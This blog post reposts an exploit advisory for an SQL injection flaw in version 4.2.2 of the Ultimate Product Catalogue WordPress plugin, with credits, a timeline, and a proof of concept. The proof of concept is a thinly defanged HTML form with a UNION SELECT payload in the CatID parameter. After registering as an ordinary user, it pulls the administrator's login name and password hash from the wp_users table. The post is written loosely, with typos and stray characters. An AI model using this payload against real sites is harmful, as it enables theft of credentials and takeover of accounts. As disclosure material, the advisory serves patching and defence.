WordPress Catalogue 4.2.2 Plugin - SQL Injection Vulnerability




Hi Friends Today I am going to share with you  Catalogue 4.2.2 Plugin - SQL Injection Vulnerability
# Exploit Title: Ultimate Product Catalogue 
4.2.2 Sql Injection – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
#Vendor Homepage:https://wordpress.org/plugins/ultimate-product-catalogue/
#Software 
Link:https://wordpress.org/plugins/ultimate-product-catalogue/
#Category: webapps
#Version: 4.2.2
#Tested on: Ubuntu 16.041 - Description:1Type user access
: register user.
$_POST[‘CatID’] is not escaped.

 http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/
2 - Proof of Concept:
1 – Login as regular user (created using wp-login.php?action=register)

 2 – Using:<*form method="post"action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories"><*input type="text" name="CatID" value="0 UNION SELECTuser_login,user_pass FROM wp_users WHERE ID=1"><*input type="submit">*delete “*” in code*

 3 - Timeline:- 22/05/2017 – Discovered- 24/05/2017 – Vendor not finded- **/06/2017 - Corrected***Rename plugin txt to zip. Problem with gmail block.

 Thanks_Malik_Ubi0day
Newer Post Older Post
Post A Comment
  • Blogger Comment using Blogger
  • Facebook Comment using Facebook
  • Disqus Comment using Disqus

No comments :


Subscribe to: Post Comments (Atom)